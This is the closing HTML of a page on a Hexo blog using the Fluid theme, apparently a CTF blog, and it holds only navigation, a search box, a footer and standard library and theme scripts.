  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/kele6.github.io/2024/04/14/XYCTF/" title="XYCTF">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">XYCTF</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/kele6.github.io/js/events.js" ></script>
<script  src="/kele6.github.io/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/kele6.github.io/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/kele6.github.io/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/kele6.github.io/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
